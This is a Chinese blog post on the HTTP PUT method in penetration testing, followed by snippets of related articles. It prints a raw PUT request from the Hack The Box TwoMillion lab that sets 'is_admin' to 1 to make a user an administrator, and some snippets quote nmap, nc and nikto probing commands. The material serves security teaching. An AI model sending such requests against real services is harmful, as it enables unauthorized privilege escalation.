渗透测试与HTTP中的PUT请求

最新推荐文章于 2024-04-13 04:34:53 发布
原创 最新推荐文章于 2024-04-13 04:34:53 发布 · 780 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#http #网络协议 #网络 #安全

文章讨论了PUT请求在服务器资源管理中的作用,以及在渗透测试中如何利用服务端暴露的PUTAPI,如HTBTwoMillion靶场中修改用户权限的示例,提醒了安全风险。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

PUT 请求用于向服务器更新指定资源,可以理解为对服务器上的资源进行修改操作。使用 PUT 请求方式会覆盖原有的资源内容,因此需要谨慎使用。

在渗透测试中,有可能服务端会暴露PUT请求的api,如修改用户权限的api,例如HTB的TwoMillion靶场就利用了这个api将普通用户提升为管理员用户:

PUT /api/v1/admin/settings/update HTTP/1.1

Host: 2million.htb

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br

Accept-Language: zh-CN,zh;q=0.9

Cookie: PHPSESSID=lb54v6es5dm1k3h5fvk8vu325p

Connection: close

Content-Type:application/json

Content-Length: 51



{

	"email":"12345@gmail.com",

"is_admin":1

}

oneynhongx
关注
Web安全测试(一):HTTP请求详解
ml202187的博客
08-22 1032
安全渗透部门同事合力整理的安全测试相关资料教程,全方位涵盖电商、支付、金融、网络、数据库等领域的安全测试,覆盖Web、APP、中间件、内外网、Linux、Windows多个平台。学完后一定能成为安全大佬!《全栈安全测试教程(0基础)》HTTP1.0的请求方法了解HTTP1.0三种请求方法,GET, POST 和 HEAD掌握GET请求的标准格式掌握POST请求提交表单,上传文件的方法了解HEAD请求GET请求的区别HTTP1.1新增的请求方法。
安全架构-HTTP协议幂等性
ctotalk
12-19 8290
安全架构-HTTP协议幂等性 幂等性设计是架构师必须具备的技能之一,需要深入理解幂等性设计的相关原理和解决方法。 上一篇文章中介绍了api接口的幂等性,主要从业务逻辑处理的方面进行业务保障,做到实现幂等性。本文介绍HTTP协议本身在幂等性方面的设计。 文章目录安全架构-HTTP协议幂等性前言一、http幂等性二、http请求方式简述三、HTTP 协议的幂等性总结 前言 HTTP协议是当前rpc,分布式架构,微服务架构中应用最广泛的协议之一,对HTTP需要有深入的了解,后续也将编写HTTP协议知识相关的
REST 测试工具(HTTP PUT DELETE方法支持)
10-24
HTA文件,只能在WINDOWS下运行。支持任意HTTP头信息, 可以选择查看HTTP返回的头信息。 POST请求会自动加上Content-Type:application/x-www-form-urlencoded 用MDB保存提交数据功能,非常适合HTTP调试。
curl put方法 测试http_HTTP PUT方法利用的几种方式
weixin_39736379的博客
12-24 1123
HTTP PUT方法利用在本文中,我们将会利用metasploitable2靶机上的HTTP PUT漏洞。通过此漏洞你可以轻而易举的向服务器上传恶意文件,并可以在meterpreter shell中获得整个服务器的访问权限。上一篇文章我们讲过了如何使用Curl,Nmap和OpenSSL来测试HTTP方法。如果服务器启用了HTTP PUT方法,我们就可以利用它来上传指定的资源到目标服务器上,比如we...
网络渗透测试-使用put方法
网络安全领域优质创作者
11-05 1412
以下均为实际攻击过程,记录笔记,仅供学习参考 nmap-T4 -A -sS-sV-vv--script vuln -p- --open -n -Pn10.11.1.13 -oX10.11.1.13.xml扫描 nc10.11.1.13 80 OPTIONS /script/ HTTP/1.1 Host:10.11.1.13检测开启了put方法 nikto-hhttp://192.168.179.142/dav/检测put方法 s检测是否开启put方法 ...
http接口get/post/put/delete请求测试
qq_45667680的博客
09-02 1574
http接口get请求方式 // TODO 返回值为json数据 @RestController public class TwoHttpController { private Map<String, Object> map = new HashMap<>(); /** * 1.获取用户信息 ,restful风格 * * @return */ @RequestMapping(value = "/v1/{city_id}
Jmeter接口测试⑤——PUT请求
测试领域技术分享
08-25 3427
本节以更新设备名称为例。 一、PUT接口测试数据准备 本博客的测试案例都是以工作中的项目为例,所以涉及到保密问题,部分信息将被覆盖。 二、PUT请求 线程组右键->添加->取样器->http请求 名称:put请求 协议:https IP:host中的值 方法:PUT 路径:path中的值 消息体数据:data中的值 三、查看结果树 返回更新设备名称信息成功。 ...
【Web开发安全测试】HTTP数据包解析Postman使用:请求方法、请求头修改及状态码判断
最新发布
04-22
首先阐述了HTTP请求返回的基本概念,包括GET、POST、HEAD、PUT、TRACE、DELETE、OPTIONS、CONNECT八种请求方法的特点和应用场景。接着深入讲解了请求包头部常见字段(如Accept、Authorization、Cache-Control等)...
安全测试-渗透测试-不安全http方法问题及解决方案.doc
09-10
### 安全测试渗透测试中的安全HTTP方法问题及解决方案 #### 一、问题背景概述 在现代网络环境中,网络安全已经成为企业和组织关注的重点之一。其中,HTTP协议作为Web应用的基础,其安全性尤为重要。然而,在...
渗透测试入门
11-11
渗透测试是一项非常重要的安全评估活动,它可以帮助组织发现并修复系统中存在的安全漏洞,从而提高整体安全性。同时,对于Web应用程序而言,理解和掌握HTTP协议的基本原理也非常重要,它不仅是Web开发的基础,也是...
Web Service 渗透测试.docx
06-19
渗透测试中,发现Web Service的方法多种多样,包括但不限于: 1. 使用代理软件(如Burp Suite)监控网络流量,寻找可能的Web Service请求。 2. 利用搜索引擎(如Google和Bing)搜寻暴露的接口,例如通过特定的搜索...
PUT漏洞实战
qq_23347209的博客
06-06 699
发现开放了22和80端口 浏览器打开站点,大概是这样的↓ 发现敏感目录👇 并没有发现什么有用的信息 parrot选择owasp-zap进入 开始主动扫描👇 发现了存在X-Frame-Options Header Not Set漏洞 以使⽤⼀个透明的、不可见的iframe,覆盖在⽬标⽹页上,然后诱使⽤户在该⽹页上进⾏操作,通过调整iframe页⾯的位置,可以诱使⽤户恰好点击iframe页⾯的⼀些功能性按钮上,导致被劫持。【不过本靶机实验用不到,了解一下😄O(∩_∩)O】 关键:允许使用PU...
接口压测之——put方法3
kash_chen007的专栏
08-25 3865
jmeter put方法3
postman测试各种请求
m0_53284765的博客
08-15 2444
总结: 1) post请求中,当使用@RequestBody注解时,URL不用参数(Params)拼接的,要选择Body→raw→JSON,然后采用如下图的传参方法; 2) get请求,delete请求,put请求则都是选择Params的方式,参数拼接在URL地址栏中即可; 3) 当controller中采用restful风格时,URL传参方式要之对应,如http://localhost:8091/user/status/6/1(6代表id,1代表状态修改). 一.post请求 1.新增用户 .
接口测试入门(一)-HTTP协议基础
做测试多少要会点的技能
08-11 2953
接口功能测试算是测试工程师绕不过去的一个重要技能。 而掌握接口测试,需要先知道什么是HTTP协议。
Web安全测试实战之测试HTTP方法
华为云官方博客
09-02 3207
一、Http方法测试 有些Web服务器默认情况下开放了一些不必要的HTTP方法(如DELETE、PUT、TRACE、MOVE、COPY),这样就增加了受攻击面。 测试方法: 1、打开webscarab,找到manual request这个标签 2、在Request的Parsed的Method中填入OPTIONS 3、在URL中填入我们的待测环境中的一个静态页面 4、在Version中...
Http方法之PUT
四季豆的专栏
12-26 4376
PUT方法POST类似,PUT方法POST类似,但是在HTTP中,PUT被定义为具备幂等性(idempotent)的方法,POST则不是。具备幂等性也就意味着,在REST服务的API中,如果你想对一个API执行多次操作,而对于服务器造成的结果是相同的,那你就得考虑使用PUT方法。即是说,如果你考虑该API实现的是两个不同的结果,那就不需要幂等性;而如果该API是为了更新某个现有资源的URI,后一
http put和post方法有什么区别?_http请求put和post区别
2301_76225520的博客
04-13 2944
T行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!2、在工作中,运维人员经常需要跟运营人员打交道,请问运营人员是做什么工作的?6、Squid、Varinsh和Nginx有什么区别,工作中你怎么选择?5、LVS、Nginx、HAproxy有什么区别?9、讲述一下Tomcat8005、8009、8080三个端口的含义?7、Tomcat和Resin有什么区别,工作中你怎么选择?3、现在给你三百台服务器,你怎么对他们进行管理?
WEB代码审计渗透测试:updateapps调用分析
"本文主要探讨了WEB代码审计渗透测试,特别是针对PHP应用程序,重点在于理解变量函数在形成漏洞中的作用。文章通过分析updateapps()函数的调用,揭示了PHP代码安全审计的关键点,包括变量处理、危险函数以及如何...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值